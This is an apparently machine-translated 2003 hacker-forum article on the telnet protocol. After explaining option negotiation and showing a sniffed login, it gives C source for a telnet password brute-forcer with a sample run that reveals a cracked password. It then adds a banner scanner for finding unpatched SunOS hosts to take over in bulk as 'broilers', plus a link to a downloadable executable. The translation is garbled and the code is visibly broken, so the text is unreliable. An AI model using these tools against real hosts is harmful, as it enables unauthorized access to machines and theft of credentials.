Author: loose Source: gray track Add Time: 2003-3-10 Dawei news station called telnet is nothing more than an attack on the user's guess telnet telnet service and the overflow of the process, in addition to these, I do not think telnet Too big question. The connection of Telnet is not as simple as everyone's imagination, although there is no encryption like SSH, but it is more complex than FTP. D:> Telnet 192.168.25.1 Red Hat Linux Release 7.3 (Valhalla) kernel 2.4.18-3 on AN i686 login: Chi Password: XXXXXX Last Login: Mon Feb 24 13:43:30 from 192.168.25.1 [CHI @ chi chi ] $ Now let's know a little about Telnet! The purpose of Telnet Protocol is to provide a relatively universal, two-way, an eight-bit byte communication method. Its main goal is to allow the standard method of the interface terminal device and the interaction of the terminal. It can be foreseen that can also be used to communicate with the terminal to the terminal to process communication (distributed calculation). A Telnet connection is a transfer data for transmitting control protocols. The Telnet protocol is based on three basis: 1. The concept of a network virtual terminal; when a Telnet connection is established, each end is assumed to use a network virtual terminal, that is, NVT. NVT is a representative of an imaginary standard device universal device. This eliminates the "server" and "user" machines to understand the characteristics of the other machine terminal, and the terminal can directly handle the dialog 2. The method of the dialogue is based on a dialog-based connection. They use the "Do, Don't, WILL, WON n't" structure to allow the subscriber and server to establish a more intricate Telnet session connection. This option includes changing a character set, a response mode, and more. The basic policy for setting options is that either party is initialized to request a request to take effect. The other party can accept it or reject this request. If the request is accepted, this option takes effect immediately; if it is rejected, the connection still maintains the basic NVT connection properties. 3. Coordination of terminals and processing; at one party, set hardware to abandon control at each line. When this happens, the local computer handles input data and determines whether or not, if not, the control is sent back to the terminal. If an output is required, the computer will hold control power until the output data is sent. The difficulty of using this terminal on the network is obvious. Here is a high demand for coordination. All telnet command structures include a sequence of two bytes: followed by a IAC. The command regarding the option session is composed of three bytes, and the third byte is about the option reference. Here is the defined telnet command. ............... ................................................ ................................................ ....... SE 240 end sub-session parameters. NOP 241 has no operation. Data Mark 242 Synch's data stream portion. This should always be sent together with the TCP emergency sign. BREAK 243 NVT character brk. Interrupt Process 244 IP function. Abort Output 245 AO function. Are you there 246 ayt function. ERASE Character 247 EC function. ERASE Character 247 EL function. Go Ahead 249 The GA signal. SB 250 indicates that the following is a sub-dialog that indicates an option.
Will (Option Code) 251 indicates that you want to start execution, or confirm that the option is now operating the indication. WON't (Option Code) 252 indicates the option to refuse to execute or continue the reference. Do (Option Code) 253 indicates that the other party is executed or confirmed to see the option to execute the instructions. DON't (Option Code) 254 indicates that the other party stops execution, or a diagnosis requires the other party to stop executing the instructions.
Iac 255 data byte 255 .......................................... ................................................ .............................. We use Sniffer to track Telnet's landing process. 9. IP / TCP, 00: 01: 02: E1: 35: 84 <= 00: 50: 56: 46: 40: 41, 1992.168.25.1 <= 192.168.25.1 <= 192.168.25.3, 3225 <= 23, 0.391, 66, Telnet Command: Do Terminal-Type Command: Do Terminal -Speed Command: Do X-Display-Location Command: Do New-Environ 10, IP / TCP, 00: 01: 02: E1: 35: 84 => 00: 50: 56: 46: 40: 41, 192.168.25.1 => 192.168.25.3, 3225 => 23, 0.010, 60, Telnet Command: Will Terminal-Type Command: Will NAWS 13, IP / TCP, 00: 01: 02: E1: 35: 84 => 00: 50: 56: 46 : 40: 41, 192.168.25.1 => 192.168.25.3, 3225 => 23, 0.000, 63, Telnet Command: Won't Terminal-Speed Command: Won't X-Display-Location Command: Won't new-environ 18, IP / TCP, 00: 01: 02: E1: 35: 84 <= 00: 50: 56: 46: 40: 41, 192.168.25.1 <= 192.168.25.3, 3225 <= 23, 0.000, 63, Telnet Command: do naws Command: SB Terminal-Type Command: EB 26, IP / TCP, 00: 01: 02: E1: 35: 84 <= 00: 50: 56: 46: 40: 41, 192.168.25.1 <= 192.168.25.3, 3225 <= 23, 0.000, 66, Telnet Command: Will Suppress-Go-ahead Command: Do Echo Command: Will Status Command: Do Toggle-Flow-Control 31, IP / TCP, 00: 01: 02: E1: 35: 84 => 00:50: 56: 46: 40: 41, 192.168.25.1 => 192.168.25.3, 3225 => 23, 0.000, 63, Telnet Command: Will Echo Command: WON 'TETUS Command: Won't Toggle-Flow-Control 34, IP / TCP 00: 01: 02: E1: 35: 84 <= 00: 50: 56: 46: 40: 41, 192.168.25.1 <= 192.168.25.3, 3225 <= 23, 0.040, 126, Telnet Command: don't echo command : Will Echo Data: Red Hat Linux Release 7.3 (Valhalla) kernel 2.4.18-3 on AN i686
(Note that Banner is received here) 35, IP / TCP, 00: 01: 02: E1: 35: 84 => 00: 50: 56: 46: 40: 41, 192.168.25.1 => 192.168.25.3, 3225 => 23, 0.010, 57, Telnet Command: Won't Echo 36, IP / TCP, 00: 01: 02: E1: 35: 84 <= 00: 50: 56: 46: 40: 41, 192.168.25.1 <= 192.168.25.3 3225 <= 23, 0.000, 61, Telnet Data: Login: (Receive Login bytes) 39, IP / TCP, 00: 01: 02: E1: 35: 84 => 00: 50: 56: 46: 40 : 41, 192.168.25.1 => 192.168.25.3, 3225 => 23, 0.000, 57, Telnet Command: Do Echo (here you can send your username) 62, IP / TCP, 00: 01: 02: E1: 35: 84 = > 00: 50: 56: 46: 40: 41, 192.168.25.1 => 192.168.25.3, 3225 => 23, 0.010, 56, Telnet Data: 67, IP / TCP, 00: 01: 02: E1: 35: 84 < = 00: 50: 56: 46: 40: 41, 192.168.25.1 <= 192.168.25.3, 3225 <= 23, 0.000, 64, Telnet Data: password: (received password bytes) 97, IP / TCP, 00: 01: 02: E1: 35: 84 => 00: 50: 56: 46: 40: 41, 192.168.25.1 => 192.168.25.3, 3225 => 23, 0.220, 56, Telnet Data:
(Send is completed, if success will return the following) 104, IP / TCP, 00: 01: 02: E1: 35: 84 <= 00: 50: 56: 46: 40: 41, 192.168.25.1 <= 192.168.25.3 , 3225 <= 23, 0.000, 105, Telnet Data: Last Login: Thu Feb 27 10:06:16 from 192.168.25.1
For Telnet, the successful landing is over here, and you can write a guess for the Telnet username by pressing the previous process! / ************************************************** *************************************************** Bill this is my red hat 7.3 Write Telnet User Check, you can do it, you can change it as soon as you change it. * / #Include
#include
#include
#include
#include
#include
#include
#define port 23 #define max 1024 Main (int Argc, char * argv []) {file * userfile; file * passfile; file * ipfile; char user [1024]; char pass [1024]; char scan_ip [1024]; IF (Argc <4) {usage (argv [0]); exit (1);} if ((ipfile = fopen (argv [3], "r") == null) {Printf ("Could Not Read the IPFILE / N "); exit (2);} while (IPFile,"% s ", & scan_ip)! = EOF) {IF ((userfile = fopen (argv [1]," r ") == null ) {PrintF ("could not read the inputfile / n"); exit (2);} while (fscanf (userfile, "% s", & user)! = EOF) {if ((passfile = fopen (argv [2] , "r")) == null) {PrintF ("could not create the outputfile / n"); exit (2);} while (fscanf (passfile, "% s", & pass)! = EOF) {telnet_banner Scan_ip, user, pass);}}} exit (1);} int usage ("welcome to www.9836.com / n"); Printf ("Usage:% s
/ n ", pro); exit (0);} Telnet_banner (char * ip, char * check_user, char * check_pass) {struct sockaddr_in addr; u_char buf [max]; int SOCK, SIZE, I = 0; IF (( SOCK = Socket (AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {Printf ("Socket Failt"); exit (1);} addr.sin_family = af_INET; addr.sin_port = HTONS (port); addr.sin_addr. S_addr = inet_addr (IP); IF (Connect (STRUCK, STRUCKADDR *) & addr, sizeof (addr)) == -1) {Printf ("Connect Failt"); EXIT (1);} while (i <10 ) {read (SOCK, BUF, 1); if (* buf == 255) / * IAC * / read (SOCK, (BUF 1), 2); if (* (BUF 1) == 253) / * Is do * / {* (BUF 1) = 252; Write (SOCK, BUF, 3); / * Send Won't * /} i ;} if (* buf! = 0) {BZERO (BUF, SIZEOF (BUF)); Read (Sock, BUF, SIZEOF (BUF)); / * Read Telnet Banner * / Printf ("% S", BUF);} Bzero (BUF, SIZEOF (BUF)); Read (SOCK , BUF, SIZEOF (BUF)); / * login * / * (BUF 0) = 255; * (BUF 1) = 253; * (BUF 2) = 0x01; Write (SOCK, BUF, 3); / * IAC do echo * / write (sock, check_user); / * Send a username * / * (BUF 0) = 0x0d; * (BUF 1) = 0x0a; w Rite (SOCK, BUF, 2); / * Indicates that the send is complete * / read (Sock, BUF, SIZEOF (BUF)); read (Sock, BUF, SIZEOF (BUF)); / * Password byte * / Write (SOCK CHECK_PASS, SIZEOF (Check_pass) 3); / * Send password * / * (BUF 0) = 0x0d; * (BUF 1) = 0x0a; Write (SOCK, BUF, 2); / *
Indicates that the send is complete * / read (SOCK, BUF, SIZEOF (BUF)); / * Read Election * / Printf ("% S", BUF); IF (strstr (BUF, "from")! = Null) / * Judgment * / {Printf ("/ NUSER% S IS FOUND, Password IS% S / N", check_user, check_pass;} close (sock);} / ************* *********************************************************** *********************** / Use result: E: / cygwin / home / chi> telnet user.txt pass.txt ip.txt red Hat Linux Release 7.3 (Valhalla) kernel 2.4.18-3 on An i686 Last Login: Thu Feb 27 20:07:49 from 192.168.25.3 User Chi Is Found, Password IS 2211wen Red Hat Linux Release 7.3 (Valhalla) kernel 2.4.18-3 ON AN I686 Ssword: Red Hat Linux Release 7.3 (Valhalla) kernel 2.4.18-3 on An i686 Ssword: Red Hat Linux Release 7.3 (Valhalla) kernel 2.4.18-3 on An i686 Ssword: Red Hat Linux Release 7.3 (Valhalla Keernel 2.4.18-3 on An i686 Ssword: Red Hat Linux Release 7.3 (Valhalla) kernel 2.4.18-3 on AN I686 Ssword: E: / Cygwin / Home / Chi> In addition to telnet users, Some only have overflow for Telnet service or telnet process! Telnet's login actually used the login file, everyone is not thinking of Rootkit, so on SunOS-Telnet vulnerability, there are still many hosts that do not make up! As for the use of Sunos-Telnet, I don't say it! I only summarize the way to get a large number of broilers! When SunOS's basic installation, I opened Telnet, so most SunOS hosts did not deliberately change his Banner, so Telnet's banner is very important to us! Mr. open SuperScan, scan a large area and scan 111 or 22, which is the difference between the UNIX machine and the Windows port, so that the point of Windows hosts, then, save the list you sweep, and import Superscan again, this time Scanning is a 23-port. The host has not been omitted! However, filtering SuperScan's IP list and turns into a list of pure IPs! [You need the program here to download http://9836.com/software/file.exe] Next is the scan of Telnet Banner! Didn't forget this above the program, I have changed it into Telnet Banner Check, not the user's scan! / ************************************************** **************************************************************** / # include # include # Include
#include
# include # include
#include
#include
#define port 23 #Define max 1024 file * output; main (int Argc, char * argv []) {file * input; file * ipfile; char scan_ip [1024]; if (argc <3) {usage (argv [0) ]); EXIT (1);} if (argc == 3) {IF ((OUTPUT = FOPEN (Argv [2], "WB")) == NULL) {Printf ("Could Not Creat The OutputFile / N" ); exit (2);} IF (INPUT = FOPEN (Argv [1], "R")) == null) {Printf ("Could Not Read the InputFile / N); Exit (2);}} While (FSCANF (INPUT, "% s", & scan_ip)! = EOF) {telnet_banner (scan_ip, argv [3]);} exit (1);} int usage ("Welcome to WWW. 9836.com / N "); Printf (" USAGE:% s
/ n ", pro); exit (0);} Telnet_banner (char * ip, char * TIMES) {struct socmeddr_in addr; u_char buf [max]; int suck, size, i = 0; IF ((Sock = Socket) AF_INET, SOCK_STREAM, IPPROTO_TCP) == -1) {Printf ("socket failT"); exit (1);} addr.sin_family = af_INET; addr.sin_port = htons (port); addr.sin_addr.s_addr = INET_ADDR ( IP); IF (Connect (STRUCK, (STRUCKADDR *) & addr, sizeof (addr)) == -1) {PrintF ("Connect Failt"); EXIT (1);} while (i <10) {read SOCK, BUF, 1); if (* buf == 255) {read (SOCK, (BUF 1), 2);} if (* (BUF 1) == 253) {* (BUF 1) = 252; Write (SOCK, BUF, 3);} i ;} if (* buf! = 0) {BZERO (BUF, SIZEOF (BUF)); Read (SOCK, BUF, SIZEOF (BUF)); Printf ("% S ", BUF); if (strstr (BUF," SunOS ")! = null) {* (BUF 14) = 0; FPRINTF (Output,"% S ", BUF); FPUTS (IP, Output);} } Close (SOCK);} / ************************************************************ *********************************************************** ********** / Please ask more, thank you for helping me.
